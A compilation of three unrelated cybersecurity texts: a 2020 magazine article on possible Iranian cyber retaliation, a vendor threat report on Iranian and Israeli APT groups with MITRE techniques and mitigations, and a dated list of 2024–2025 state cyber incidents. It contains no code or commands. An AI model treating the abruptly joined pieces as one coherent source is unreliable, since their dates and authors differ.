Gear-obsessed editors choose every product we review. We may earn commission if you buy from a link. Why Trust Us?

If you assassinate a senior political leader in 1914, you can expect a traditional war to follow. If you assassinate a senior political leader in 2020 , it would be foolhardy to assume that only a traditional war will follow.

So as the U.S. prepares to deal with fallout from the killing of Iranian General Qassem Soleimani, we must assume, anticipate, and expect that a primary mode of retaliation from Iran will be a cyber attack. And we must prepare for civilians to be caught in the crosshairs.

Most Americans have no idea how to protect themselves from any kind of cyber crime, let alone an offensive, aggressive, and intentionally overt retaliatory attack. Here’s what you need to consider.

What Can You Expect?

“We have been at war with Iran for more than a decade, and people just didn’t realize it,” says James Lewis, the Senior Vice President and Director of the Technology Policy Program at the Center for Strategic and International Studies .

The U.S. and Israel targeted Iranian nuclear facilities with the in 2009; the attack was intended to cripple Iranian efforts to enhance their nuclear arsenal. For a time it worked; however, as a result, Iran has been improving its own cyber-capability. Like every new weapon introduced in every war theatre in our recorded history, the weapon that once helped gain an advantage can and is now being targeted against us.

Since 2009, Iran has used cyberweapons to attack oil and gas facilities , bank facilities , the electrical grid , and even a tiny dam in upstate New York .

“Iran has been linked to global financial attacks as well as destructive attacks via wiper malware, and increasingly leverages social media for disinformation and pro-regime propaganda,” says Andrea Little Limbago, the Chief Social Scientist at Virtru .

In November 2019, reports came out that Iran was carefully and directly targeting 2,200 facilities with a strong focus on critical infrastructure and critical control systems that regulate our water and electrical grids. While Iran’s capacity to attack is not considered as sophisticated as China or Russia, Peter Singer, a strategist for the think tank New America, emphatically counters, that “to say they have no capability is nonsense.”

An Israeli general put it a slightly different way in 2017 when he said, “They are not the state of the art, they are not the strongest superpower in the cyber dimension, but they are getting better and better.”

“Cyber is the only thing that gives [Iran] the long range reach,” Lewis says. “It’s the easiest way for them to do anything in the U.S.”

ATTA KENARE // Getty Images Iranians are rallying for retaliation for the killing of Iranian General Qassem Soleimani. Could that mean a cyber attack on critical American systems?

When You Can Expect It?

The rising specter of cyber attacks and ensuing public anxiety highlights that we have very little idea about how to prepare for or respond to an attack on the individual level. The government approach to cybersecurity is largely dependent on where the attack occurs: domestic versus abroad, military versus civilian targets. However, the Department of Homeland Security will issue a statement over the threat level, like it did this past weekend , and coordinate and alert the public.

Additionally, a cyber attack with broad public implications will see similar emergency activation services like any other large public threat, such as hurricanes or snowstorms. The problem? We probably won’t know in advance, and it could take out massive aspects—even for short durations—of our critical infrastructure: power, water, television, internet, and cell phone communication networks.

“Cyber is the only thing that gives [Iran] the long range reach. It’s the easiest way for them to do anything in the U.S.”

We should and can trust the government to respond to aggressive overtures from a foreign nation. However, we shouldn’t allow our faith in the government to be a cover for our own ignorance about geopolitical threats. At its best, our government is a reflection of the shared intellect of its people. At its worst, it’s a reflection of the ignorance of the population.

To stay educated on cyberthreats, consider following popular resources like:

ATTA KENARE // Getty Images An Iranian mourner holds a placard during the funeral processions for Qasem Soleimani.

What Can You Do to Protect Yourself?

Iran has gone after commercial and enterprise related information systems. However, these are primarily in oil and gas, SCADA, and other critical infrastructure-related systems. If you work in those environments, you should be particularly cautious.

Threats from China, Russia, or other nations only have the potential to increase in the heightened state of the current environment. This is because a nation or criminal actor wishing to sow dissent could attack the U.S. and attempt to pin attribution on Iran. Chaos in the system creates opportunity for malicious actors.

This means you should follow the basics of good cybersecurity protection:

Always use different and hard passwords for your web logins. Be careful of emails that require you to click links or download documents. Confidently use multi-factor authentication wherever you can. Don’t use text messages; substitute encrypted messaging systems and also consider encrypted email like Proton .

For more tips on general cybersecurity hygiene, visit Don’t Click on That.

Will There Be a Global Escalation of Attacks?

“I don’t want to sound alarmist, but the risk of a cyber attack from Iran is higher now than it has ever been,” says Mike Sexton, Program Director at the Middle East Institute . “That’s not necessarily to say that a cyber retaliation is likely, but that we’ve been rolling dice with Iran for a decade in cyberspace, and we’ve just started using a very dangerous new pair of dice.”

The escalation of war could take a number of different scenarios, such as attacking our nuclear program which was recently put online , attacking our satellite infrastructure —which has weak defense mechanisms in place—or attacking a major city. However, Iran is currently unlikely to make an escalation of this level, according to several senior policy leaders and officials.

Instead, we should anticipate that Iran will look for high-profile events (like the U.S. election) to disrupt, or smaller targets that send a message, but don’t risk catastrophic retaliation. This may include second- or third-tier American cities like Tulsa, Tucson, or Toledo.

“[Iran is] looking for vulnerable targets in places that will get attention,” Lewis says. “It’s easier for them to target in the Middle East, but they have probed smaller targets in the U.S.”

Specifically, experts warn against attacks on our oil and gas infrastructure. Iran has ample knowledge of oil and gas infrastructure, has shown a targeted effort to hack systems that support oil and gas, and know they’re a critical foundational resource in the American economic system. As such, there’s also heightened concern about the potential targeting of those pipelines in the U.S. Disabling a pipeline could result in a disruption of service, an explosion, or cause an oil spill.

“We’ve been rolling dice with Iran for a decade in cyberspace, and we’ve just started using a very dangerous new pair of dice.”

And it doesn’t need to be an actual explosion, Singer says. Sometimes the threat of an attack is enough if rumors of the attack is then propagated through social media. A tweet of misinformation can cause widespread confusion and chaos. As in all things, double check your sources. If you didn’t trust them before, don’t trust them now.

A Word of Hope

Here’s the good news: It’s unlikely that Iran will respond to the assassination with a cyber attack that will cripple the U.S. for a long period. The risk to Iran isn’t worth the unknown escalatory and retaliatory attack from an administration that’s difficult to predict. As such, we should anticipate a pointed, but smaller scale attack that will shake us, but not destroy the foundations of our country.

That being said, if we don’t learn to protect ourselves individually and collectively, educate ourselves and elect officials who can further protect us, or become wise to and aware of the state of the world around us, we’ll destroy the foundations of our country all on our own.

Key Points

Escalated tensions between Iran and Israel could give rise to cyber threats.

Several advanced persistent threat (APT) groups are involved on both sides: APT34, APT35, and CyberAv3ngers in Iran, and Predatory Sparrow in Israel.

Iranian-affiliated APTs utilize a wide array of TTPs, including spearphishing and drive-by compromise, to significantly expand the attack surface for companies with ties to Israel or Israeli vendors.

At-risk organizations can take basic measures to protect themselves from these APT groups, including user training, regular patching, and network segmentation.

In early April 2024, Israel and Iran engaged in retaliatory airstrikes, which resulted in the death of military personnel on both sides and allegedly caused damage to military assets in both nations. While both Iran and Israel have recently expressed their intention to defuse the situation, tensions remain high. These tensions extend to international businesses and corporations that work within the Israeli or Iranian economy. APT groups affiliated with either nation have demonstrated their capacity to launch sophisticated cyber campaigns, targeting not just governmental institutions but also corporate entities. Cyber attacks motivated by this conflict could lead to data breaches, operational disruptions, and reputational damage to brands.

This report examines three prominent advanced persistent threat (APT) groups (APT34, APT35, and CyberAv3ngers) based in or linked to Iran, known for targeting Israel and its associated entities. Additionally, the report includes a concise overview of a group (Predatory Sparrow) focusing on Iranian targets that is believed to be connected to Israel. We also delve into the common tactics, techniques, and procedures (TTPs) these groups utilize and present key advice for detection and mitigation of these threats. This report is particularly valuable for organizations engaged in business with Iran or Israel or their vendors or suppliers.

Iranian Threats

Strategic deployment of APT and hacktivist groups is a key component of Iran’s cyber warfare tactics. These groups are often ideologically driven, aiming to gather intelligence and disrupt the normal functioning of critical infrastructure and corporate entities. By infiltrating networks through sophisticated spearphishing campaigns, exploiting zero-day vulnerabilities, and deploying bespoke malware, these groups can steal sensitive information, damage systems, and cripple financial operations, causing significant economic and reputational harm.

Israeli government and military organizations and companies in integral business industries like finance, energy, telecommunications, and technology are natural targets whose disruption could undermine Israel’s economic stability and international standing. However, the threat from Iranian APT and hacktivist group also extends further:

For foreign companies that conduct business with Israel-based firms or that operate within Israel : Cyber attacks by Iran-linked groups on these companies could result in severe operational disruptions and financial losses. The outcomes may include data breaches, compromise of sensitive information, significant operational downtime, and possibly reputational damage that could impact the company in other markets globally.

For companies based outside Israel that use Israeli-based suppliers: If targeted by cyber attacks, these companies could face major supply-chain disruptions. The immediate effects could involve delays in product delivery, increased operational costs, and potentially a halt in production, affecting not just the directly targeted companies but also downstream customers relying on their products or services. Such a situation is especially concerning for companies or organizations that use operational technology (OT) to operate critical infrastructure, such as water treatment plants, electricity or other energy grids, and healthcare services.

**For critical sector organizations in the US and UK:**Targeted cyber attacks against these entities could severely disrupt essential services, including power, water, and healthcare systems. The strategic response from these nations, coupled with their technological and infrastructural significance, makes them prime targets for cyber operations with the intent of undermining their support for Israel. Such attacks could not only compromise public safety and national security but also provoke economic instability by disrupting critical infrastructure.

**For companies operating in Middle Eastern countries that supported Israel’s response:**Cyber attacks by Iran-linked groups carry substantial risks, given these countries’ strategic economic roles and geopolitical positions. In Jordan, cyber operations targeting the vital tourism and export sectors could lead to extensive economic repercussions amid an already dim economic outlook. The potential impact of such cyber attacks is even more significant in Saudi Arabia and the UAE, where attacks on oil and gas facilities could disturb global energy markets. Additionally, the UAE’s tech and finance sectors are liable to be prime targets for Iranian cyber attacks, which could erode investor confidence and inhibit innovation, affecting both the local economy and international investments.

This report profiles three Iranian-linked APT groups, outlining their tactics, techniques, and procedures (TTPs), while also providing customers with detection and mitigation strategies. APT34 is highlighted for its long-standing operations. APT35 is examined for its extensive campaigns against government, defense, and critical infrastructure entities in America, Europe, and the Middle East, utilizing spearphishing, social engineering, and bespoke malware. Lastly, the focus shifts to CyberAv3ngers, a group specializing in attacks on industrial control and operational technology systems, particularly through internet-connected programmable logic controllers (PLCs) and human-machine interfaces (HMI). This exploration emphasizes the growing convergence of IT and OT systems, underscoring the expanded attack surface and the internet as a prevalent entry point for cyber attacks.

APT34

The cyber espionage group APT34 (aka Twisted Kitten, Cobalt Gypsy, Crambus, Helix Kitten) focuses on infiltrating and conducting operations against high-value entities in the Middle East, including government bodies, critical infrastructure, telecommunications networks, and pivotal regional organizations. Its varied arsenal of techniques includes social engineering attacks via legitimate social networking sites, destructive operations using wiper malware, and exploiting trusted relationships to compromise supply chains. The following TTPs have featured prominently in many of the group’s campaigns.

T1566: Spearphishing Attachment

APT34 favors spearphishing to secure initial entry into target systems. The group employs social engineering tactics, often by attaching Microsoft Office or PDF documents laden with malware to its deceptive emails. To tackle the threat of spearphishing attacks, organizations should consider:

Educating employees on the risks of spearphishing attacks, emphasizing the importance of scrutinizing email attachments and links, even if they appear to come from legitimate sources.

Limiting user access rights within the organization to the minimum necessary to perform duties.

Deploying sophisticated email filtering solutions that can detect and quarantine emails containing malicious attachments or suspicious links, particularly those mimicking Microsoft Office or PDF formats.

T1059: Command and Scripting Interpreter: PowerShell

APT34 has exploited PowerShell-based backdoors in cyber attacks across the Middle East, leveraging PowerShell’s ostensibly legitimate capabilities to create fileless malware that leaves no on-disk traces. This method allows for complex operations within the operating system, data exfiltration, and lateral network movement. Continuous reloading of malicious code into memory also ensures attacker persistence within compromised systems. To mitigate this technique, organizations should:

Implement robust logging and monitoring of PowerShell activity to detect unusual or unauthorized commands that could indicate malicious behavior.

If PowerShell usage is essential, limit its execution policy solely to administrators. Using PowerShell JEA (Just Enough Administration) can also help confine administrative tasks by restricting the commands that admins or users can run during remote PowerShell sessions.

Regularly educate and train IT staff and system administrators on the potential misuse of PowerShell, including the latest tactics used by attackers, to better prepare them for identifying and mitigating such threats.

T1078: Valid Accounts

APT34 infiltrates systems by using legitimate credentials obtained from phishing or other means, enabling it to move laterally within networks undetected. This method allows the group to discreetly explore and exfiltrate sensitive data. Compromised credentials can be used to circumvent access controls across network systems, allow persistent remote system access via services like virtual private networks (VPNs) and remote desktops, and may enable attackers to access restricted network areas or obtain elevated system privileges. Combat this tactic by:

Enforcing multifactor authentication (MFA) across all user accounts to add an additional layer of security, which can significantly reduce the risk of unauthorized access even if credentials are compromised.

Conducting frequent audits of user accounts and monitoring for unusual activity patterns.

Regularly educating and training IT staff and system administrators on the potential misuse of valid accounts, including the latest tactics used by attackers, to better prepare them for identifying and mitigating such threats.

APT35

Security researchers have linked APT35 (aka COBALT MIRAGE, PHOSPHORUS, G0059, NewsBeef, Charming Kitten, Magic Hound, TunnelVision, Ajax Security, Newscaster Team) to the Islamic Revolutionary Guard Corps (IRGC). APT35 conducts long-term, resource-intensive campaigns primarily targeting American, European, and Middle Eastern government, defense, and critical infrastructure organizations. APT35 primarily conducts cyber espionage using spearphishing, social engineering, and custom malware techniques; however, it has also exploited Microsoft BitLocker to encrypt targets’ data in exchange for ransom payments. Despite APT35’s adoption of diverse strategies, three specific TTPs are common vectors in its campaigns:

T193: Spearphishing Attachment

In one notable example of this tactic in use, APT35 was linked with a phishing campaign that targeted an Israeli journalist, using a fake draft report as bait. This deceptive draft report came as a password-protected RAR file that embedded a harmful LNK file designed to deploy the “PowerStar” malware—a refined variant of its established backdoor named “CharmPower.”

The following recommendations can help defend against spearphishing.

Deploy data loss prevention (DLP) solutions to monitor and control data transfers, preventing sensitive information from being leaked or sent to unauthorized recipients.

Implement protocols like Sender Policy Framework (SPF); DKIM; or Domain-based Message Authentication, Reporting & Conformance (DMARC) to help detect and prevent email spoofing, making it harder for attackers to impersonate legitimate entities.

Conduct mock spearphishing campaigns to test employee awareness and preparedness, providing feedback and training as needed.

T1189: Drive-by Compromise

APT35 has used drive-by compromise techniques in its campaigns against Israel’s transportation, logistics, and technology sectors. The group has strategically manipulated legitimate websites to divert visitors to attacker-managed sites designed to phish for personal information and credentials. Once collected, this data is transmitted to a predefined domain for use in subsequent attacks. Recommended protective strategies include:

Ensure that all web applications are up to date with the latest security patches to minimize vulnerabilities that could be exploited in drive-by compromise attacks.

Use web filtering solutions to block known malicious sites and monitor web traffic for unusual redirections or attempts to access phishing sites.

Regularly educate employees about the risks of drive-by compromises and train them to recognize phishing attempts, emphasizing the importance of not entering personal information or credentials on unfamiliar websites.

T1595: Active Scanning: Vulnerability Scanning

APT35 has conducted extensive scans to pinpoint public systems susceptible to specific vulnerabilities, including CVE-2021-44228 in Log4j, the ProxyShell set of vulnerabilities (CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065) in on-premises Microsoft Exchange Servers, and CVE-2018-13379 in Fortinet FortiOS Secure Sockets Layer (SSL) VPNs. Organizations should consider:

Ensuring that all web applications, especially critical software such as VPNs, are up to date with the latest security patches to minimize vulnerabilities that could be exploited by threat actors using active scanning techniques.

Dividing network resources into segments to reduce the attack surface and closely monitoring traffic for unusual patterns that could indicate a scanning attempt or exploitation.

Applying strict access controls and authentication measures to all users and devices, limiting the potential impact of exploited vulnerabilities.

CyberAv3ngers

Active since 2020, CyberAv3ngers (aka CyberAveng3rs and Cyber Avengers) has been linked with the IRGC. CyberAv3ngers is a politically motivated group that primarily targets industrial control systems, OT, or critical infrastructure using programmable logic controllers (PLCs) and human machine interfaces (HMI) connected to the internet. On November 22, 2023, CyberAv3ngers carried out a successful cyber attack on multiple water and wastewater facilities in the US that were employing PLCs with HMIs built in Israel. The group likely gained access by exploiting internet-connected devices that were protected by default passwords. Public information on CyberAv3ngers’ TTPs is limited, but security researchers have highlighted its distinctive use of brute-force techniques.

T1110: Brute Force

Adversaries may use brute-force techniques to gain access to accounts when passwords are unknown or when password hashes are obtained. Without knowledge of the password for an account or set of accounts, an adversary may systematically guess the password using a repetitive or iterative mechanism. In the case of the CyberAv3ngers attack on water and wastewater facilities in the US, the attackers employed scanning tools to pinpoint accessible internet-connected devices. Subsequently, they gained entry by utilizing the default PLC credentials, which are often readily available in OT manuals available online. To protect against brute-force techniques, organizations should:

Immediately update default usernames and passwords for all OT devices to unique, strong credentials to prevent unauthorized access.

Implement routine scanning of networked devices to identify and secure internet-facing devices that may be vulnerable to unauthorized access.

Enhance network security measures by employing firewalls, VPNs, and network segmentation to limit the exposure of critical OT devices to the internet

Israeli Threats

The full extent of Israel’s cyber offensive capabilities is largely speculative: Cybersecurity research and intelligence analysis has hypothesized about Israel’s cyber activities, but the Israeli government does not admit to engaging in offensive cyber operations through affiliated entities. This approach helps to keep cyber warfare tactics confidential, minimize diplomatic fallout, and maintain plausible deniability in the international arena. Hypothetically, Israeli cyber initiatives targeting Iran would be motivated by a desire to thwart Iran’s nuclear plans, collect vital intelligence, and bolster national security through the proactive neutralization of threats. Thereby, in targeting Iran, Israeli cyber groups might focus on critical sectors, such as defense and nuclear research, alongside communication and financial systems. Such attacks would aim to strategically weaken Iran’s capabilities and apply economic strain.

Organizations should remain vigilant about the potential repercussions of Israeli cyber activities against Iranian interests. Such actions could provoke retaliatory cyber attacks from Iranian actors, not only against Israeli entities but also against international businesses perceived to have business ties with Israeli companies. These tit-for-tat attacks could expose these organizations to data breaches, operational disruptions, and compromise of sensitive information. Understanding this dynamic is vital for businesses to prepare and strengthen their cybersecurity defenses, anticipating the broader implications of geopolitical tensions manifesting in the cyber realm. This awareness is especially important for entities with ties to Israel, as they may inadvertently become targets in the escalating cyber conflict between these nations.

In light of these conditions, the following section of the report covers a prominent Israel-linked group that has focused on targeting Iranian critical infrastructure.

Predatory Sparrow

Active since 2021, Predatory Sparrow (aka Gonjeshke Darande) has claimed responsibility for cyber attacks on Iranian industrial plants and critical infrastructure. In 2021, the group disrupted Iran’s nationwide network of 4,300 gas stations by disabling the system for purchasing fuel with government-issued subsidy cards. The following year, they escalated their activities by targeting three state-owned industrial steel factories, hijacking control systems to cause equipment malfunctions and molten steel spills, resulting in significant fire damage. Continuing their offensive into 2023, Predatory Sparrow claimed to have incapacitated 70 percent of Iranian gas station infrastructure, severely hampering the country’s fuel distribution capabilities.

Although Predatory Sparrow’s cyber attacks have garnered significant attention, the reluctance of Iran to disclose details related to assaults on its critical infrastructure has led to a lack of information regarding the group’s specific TTPs. Nevertheless, insights from the ReliaQuest Threat Research Team, particularly their analyses on the targeting of Operational Technology (OT) systems by Chinese Advanced Persistent Threat (APT) groups, allow us to infer the likely TTPs employed by entities akin to Predatory Sparrow in its operations against such targets. This knowledge base provides a foundational understanding of the operational methodologies potentially utilized by Predatory Sparrow in its cyber campaigns.

T1021.001: Remote Services: Remote Desktop Protocol

Adversaries may use valid accounts to log in to a computer using the Remote Desktop Protocol (RDP). The adversary may then perform actions as the logged-on user. Threat actors such as Predatory Sparrow can use this technique to move laterally to the domain controller (DC) via an interactive RDP session using a compromised account with domain administrator privileges. Combat this threat by:

Disabling remote interactive logon of service accounts to prevent them from being used for RDP.

Configuring and enabling MFA for RDP sessions, helping to prevent lateral RDP and RDP brute-forcing.

Adhering to the principle of least privilege and minimizing RDP to only the required accounts. Configure access to critical assets that require RDP to use designated jump boxes, allowing tighter access control and improved auditing.

T1190: Exploit Public-Facing Application

Through this approach, attackers aim to leverage vulnerabilities in external-facing systems or devices to gain initial entry into a network. These vulnerabilities could stem from software bugs, temporary system faults, or configuration errors. Specifically, adversaries often target edge network devices and infrastructure components lacking strong host-based protections. APT groups frequently exploit flaws in networking appliances, including manufacturers like Fortinet, Ivanti, NETGEAR, Citrix, and Cisco, to infiltrate networks. To protect against these types of attacks, organizations can:

Utilize security tools, such as a web application firewall (WAF), to protect public-facing applications and provide logging visibility into access and requests to and from the application.

Properly segment all public-facing applications from the intranet to minimize risk of exploitation compromising sensitive infrastructure.

Adhere to a robust and frequent vulnerability assessment and patching cycle for all public-facing appliances. In case of a zero-day exploitation of a vulnerability, develop and maintain an emergency patch and mitigation plan.

T1105: Ingress Tool Transfer

This TTP allows attackers to import tools or files from an external source into a breached network. They might transfer these assets from a system they control to the target network either via the command-and-control (C2) channel or using other protocols like file transfer protocol (FTP). Once these tools or files are within the compromised environment, attackers can further distribute them across multiple devices within that network. For example, in the 2015 attack on Ukraine’s electric power facilities, the Sandworm Team, a Russian APT group, deployed additional malicious software onto already compromised systems to exfiltrate credentials, facilitate lateral movement, and ultimately destroy data. To defend against such tactics, organizations can implement the following processes.

Utilize application control solutions to help prevent threat actors from evading defenses. This can be achieved by using less-common methods of resource retrieval, such as via “certutil.”

Maintain an up-to-date block list of known hosting sites and actively monitor outbound request attempts through your forward proxy.

If an endpoint detection and response (EDR) solution is not available, leverage Sysmon Event ID 3 to log and monitor process executions generating network connections.

Threat Forecast

In the short to medium term, Israeli linked groups, motivated by a need to thwart Iran’s influence and nuclear prospects, will likely seek to continue cyber espionage and disruption efforts. Furthermore, the use of cyber mercenaries or loosely affiliated hacktivist groups such as Predatory Sparrow introduce further unpredictable elements into the conflict, making attribution and response more challenging. Similarly, Iranian APT and hacktivist groups are poised to intensify their cyber campaigns against Israeli interests, employing tactics aimed at espionage, sabotage, and propaganda spread. As both nations continue to invest heavily in cyber defense and offensive capabilities, the potential for a significant cyber incident remains elevated.

Given these conditions, it is important for organizations, especially those with business interests the affected nations, to keep abreast of developments. Staying informed about geopolitical shifts and related cyber threats is key to customizing security measures effectively. Enhancing their cybersecurity posture will enable organizations to protect their assets and maintain operational continuity amidst regional instability.

What ReliaQuest Is Doing

The ReliaQuest Threat Research team is monitoring these threat groups, continuously refining our detection capabilities and hunting methodologies to identify and alert our customers about significant TTPs utilized by adversaries like the groups mentioned in this report. Our threat hunting team actively monitors our customers’ public-facing infrastructure for exposed and susceptible services (such as RDP) that are commonly abused by threat actors looking to gain initial access.

In addition to creating specific detection rules for each of the TTPs mentioned, ReliaQuest also provides intelligence updates and detailed threat profiles through the GreyMatter Intelligence content library, covering aspects like TTPs, indicators of compromise (IoCs), tools, and information on specific attacks and campaigns. The ReliaQuest threat intelligence team also regularly incorporates high-fidelity IoCs into our threat intelligence feeds to enhance detection capabilities.

May 2025: The Czech Republic attributed a cyberattack targeting its Foreign Ministry to China. While the incident occurred earlier, the attribution was made public this May.

May 2025: Russian hackers conducted an espionage campaign against educational, government, and research-related entities in Tajikistan. The hackers reportedly used an HTML application to implant file-based malware.

May 2025: A Turkish espionage group exploited a vulnerability in a messaging app to spy on Kurdish military forces operating in Iraq over the last year. The hackers used a zero-day bug in the applications to gain access to Kurdish military messages.

May 2025: The U.K.’s National Cyber Security Center named China as the dominant threat to national cybersecurity after a series of hacks and breaches involving British government departments and critical infrastructure, including alleged attacks against the Electoral Commission and Members of Parliament.

May 2025: The United States, Britain, France, Germany, and other allies issued an advisory warning of a Russian cyber campaign targeting the delivery of defense support to Ukraine and other NATO defense and tech sectors.

April 2025: Algeria-linked hackers launched a cyberattack against Morocco’s National Social Security Fund, leaking sensitive data online. The breach reportedly exposed personal and financial details for nearly two million people from roughly 500,000 companies.

April 2025: Hackers spied on the emails of roughly 103 U.S. bank regulators at the Office of the Comptroller of the Currency for over a year, ending in early 2025. The attackers gained access via a compromised administrator account, accessing roughly 150,000 emails containing highly sensitive financial institution data. The hacks have yet to be attributed.

April 2025: U.S. Cyber Command discovered Chinese malware implanted on partner networks in multiple Latin American nations during a series of ‘hunt forward’ operations, according to Lt. Gen. Dan Caine, Trump’s pick for chairman of the Joint Chiefs of Staff.

April 2025: North Korean cyber spies are expanding their infiltration operations to target European defense and government organizations. Hackers posed as remote workers to steal data, commit espionage, and generate revenue, increasingly using extortion against former employers after gaining access.

March 2025: Iranian hackers conducted ongoing cyber espionage campaigns against government entities in Iraq and telecommunications in Yemen. Attackers used custom backdoors and novel command-and-control methods like hijacked emails and backdoors to gain access.

March 2025: A network of front companies linked to a Chinese tech firm targeted recently laid-off U.S. federal workers using recruitment ads on job sites. The operation utilized fake consulting firms with non-functional contact details and addresses, mirroring methods identified by the FBI as potential foreign intelligence recruitment tactics.

February 2025: North Korean hackers conducted an espionage campaign against South Korean entities to exfiltrate system reconnaissance data from potentially thousands of machines. The attackers used PowerShell scripts and Dropbox for command and control and data exfiltration, demonstrating improved operational security by the attackers.

February 2025: Chinese cyber espionage operations surged by 150% overall in 2024, with attacks against financial, media, manufacturing, and industrial sectors rising up to 300%, according to new reporting.

February 2025: Chinese hackers conducted ongoing cyber espionage campaigns targeting government, manufacturing, telecom, and media sectors in Southeast Asia, Hong Kong, and Taiwan. The attackers deployed a backdoor and embedded themselves in cloud services like Dropbox for command and control to evade detection.

February 2025: Chinese reporting claims that foreign APTs launched over 1,300 cyberattacks targeting 14 key sectors in China during 2024. Government agencies, education, research, defense, and transportation sectors were most affected, with attackers aiming to steal sensitive data and potentially conduct strategic sabotage.

February 2025: North Korean hackers stole $1.5 billion in Ethereum from the Dubai-based exchange ByBit. Attackers exploited a vulnerability in third-party wallet software during a fund transfer, laundering at least $160 million within the first 48 hours of the attack. It is the largest cryptocurrency heist to date.

February 2025: Chinese cyber actors conducted a coordinated disinformation campaign on WeChat against Canadian Liberal leadership candidate Chrystia Freeland, according to Canada’s Security and Intelligence Threats to Elections Task Force. The operation involved numerous accounts spreading disparaging content linked to the PRC and reached 2 to 3 million global WeChat users.

January 2025: Suspected Russian hackers executed spearphishing attacks against Kazakh diplomatic entities. Attackers imbedded malicious code within diplomatic documents, including one allegedly outlining an agreement between Germany and several Central Asian countries, for cyber espionage purposes.

January 2025: A pro-Russian hacking group claimed responsibility for a cyberattack targeting Italian government websites, including ministries, public services, and transportation platforms in cities like Rome and Palermo. The attack was reportedly a response to Italian Prime Minister Giorgia Meloni’s meeting with Ukrainian President Volodymyr Zelenskyy, where she reiterated support for Ukraine.

January 2025: Russian cyberattacks on Ukraine surged by nearly 70% in 2024, with 4,315 incidents targeting critical infrastructure, including government services, the energy sector, and defense-related entities. Ukraine’s cybersecurity agency reported that attackers aimed to steal sensitive data and disrupt operations, with tactics such as malware distribution, phishing, and account compromises.

January 2025: Cyberattacks on Taiwan by Chinese groups doubled to 2.4 million daily attempts in 2024, primarily targeting government systems and telecommunications firms, according to Taiwan’s National Security Bureau. Attackers aimed to steal sensitive data and disrupt critical infrastructure, with successful attacks rising by 20% compared to 2023.

December 2024: Chinese hackers breached a third-party vendor for the U.S. Treasury Department to gain access to over 3,000 unclassified files. The documents related to principles such as Secretary Janet Yellen, Deputy Secretary Wally Adeyemo, and Acting Under Secretary Brad Smith, in addition to the Committee of Foreign Investment in the United States and the Office of Foreign Assets Control.

December 2024: Russian hackers infiltrated a Pakistani hacking group, exploiting their infrastructure to access sensitive information stolen from South Asian government and military targets.

December 2024: Cyberattacks on Indian government entities increased by 138% between 2019 and 2023, rising from 85,797 incidents in 2019 to 204,844 in 2023, according to the Indian Ministry of Electronics and IT.

December 2024: Russian hackers targeted Romania’s election systems with over 85,000 cyberattacks and leaked credentials on Russian hacker forums. The attacks came just before Romania’s presidential vote, with attacks persisting through election day.

December 2024: Russian hackers launched a phishing campaign targeting Ukrainian armed forces and defense enterprises. The attackers deployed remote access tools to infiltrate military systems and steal credentials from platforms like Telegram and local networks.

December 2024: China’s national cybersecurity agency accused a U.S. intelligence agency of conducting cyberattacks on two Chinese tech firms since May 2023, targeting an advanced materials research unit and a high-tech company specializing in intelligent energy and digital information. The attacks reportedly led to the theft of substantial trade secrets, coinciding with heightened U.S.-China tensions over export controls on semiconductors and AI technologies.

November 2024: The United Kingdom’s National Cyber Security Center found a three-fold increase in the most significant cyberattacks compared to a year ago. NCSC provided support for 430 cyberattacks, 89 of which were “nationally significant,” and listed China, Russia, Iran, and North Korea as “real and enduring threats.”

November 2024: Chinese hackers, dubbed Salt Typhoon, breached at least eight U.S. telecommunications providers, as well as telecom providers in more than twenty other countries, as part of a wide-ranging espionage and intelligence collection campaign. Researchers believe the attack began up to two years ago and still infects telecom networks. Attackers stole customer call data and law enforcement surveillance request data and compromised private communications of individuals involved in government or political activity.

November 2024: Chinese spies planted a chip in a former U.S. three-stars general’s conference name tag to track his every move during his time serving in the Indo-Pacific.

November 2024: Iranian hackers have been targeting aerospace, defense, and aviation industries in Israel, the UAE, Turkey, India, and Albania, according to Israeli reports. Hackers pose as recruiters on LinkedIn and distribute malware to victims through fake lucrative job offers to spy on targets and steal sensitive data starting in 2023. The malware and tactics are similar to those of a North Korean hacking group that targeted cryptocurrency exchange-traded funds.

November 2024: South Korean officials accused pro-Russian hackers of attacking civilian and government website, following South Korea’s decision to monitor North Korean troops in Ukraine. Several pro-Russian hacktivists have claimed the attacks, but no final attribution has been made.

October 2024: Russian agents sent emails about bomb threats to nearly 60 Ukrainian embassies worldwide, as well as media outlets and state agencies.

October 2024: Iranian agents are increasing their espionage efforts against government agencies in the United Arab Emirates. Attackers deployed a backdoor to exfiltrate sensitive credentials

October 2024: Russian cybercriminals sent information-stealing malware to an unknown number of Ukrainian draft-age men to undermine Ukraine’s military recruitment efforts.

October 2024: Australia introduced its first national cyber legislation, the Cyber Security Bill 2024. It is the country’s first attempt to codify security standards for ransomware reporting and smart devices and proposes a framework for managing the impact of significant cyber incidents.

October 2024: Chinese hackers have breached at least twenty Canadian government networks over the last four years, according to the Canadian Cantre for Cyber Security (CCCS). CCCS reported that the objectives of the breach include espionage, IP theft, malign influence, and translational repression. The statement comes after CCCS revealed a Chinese threat actor was conducting surveillance scans of Canadian parliamentary and political networks.

October 2024: Russian hackers sent compromised emails disguised to appear as if they were sent from Amazon or Microsoft to infiltrate Ukrainian state and military devices and steal credentials from victims. The scope of the campaign is unknown.

October 2024: Chinese hackers hacked cellphones used by senior members of the Trump-Vance presidential campaign, including phones used by former President Donald Trump and JD Vance as well as people affiliated with the Harris-Walz campaign. It is unclear what data may have been accessed. The FBI is investigating the incident.

October 2024: New reporting reveals Chinese-backed hackers have been conducting large data exfiltration operations against Thailand’s government institutions. Hackers first gained access in 2023 through a brute force attack on a local area network before gaining privileged access and beginning data exfiltration.

October 2024: Ukrainian hackers attacked Russia’s state media company and electronic court document management system on Putin’s birthday. The attack prevented Russian courts from filing lawsuits or viewing court hearing schedules for several days, and it interrupted all streaming services of prominent TV and radio stations in Russia.

September 2024: Chinese hackers have been conducting an ongoing cyber espionage campaign against Middle Eastern government entities that published human rights studies related to the Israel-Hamas War. The campaign was discovered in June 2024 after researchers discovered malware implants that were designed to ultimately deliver a malware implant.

September 2024: Russian cyber spies conducted an espionage campaign against Mongolia’s Ministry of Foreign Affairs and Cabinet websites. The spies added malicious code to the websites to exfiltrate a victim’s browser cookies. Attackers used the same exploits as those sold by commercial surveillance vendors such as NSO Group and Intellexa, but it is unknown if these companies knowingly sold their exploits to the Russian government, according to reports.

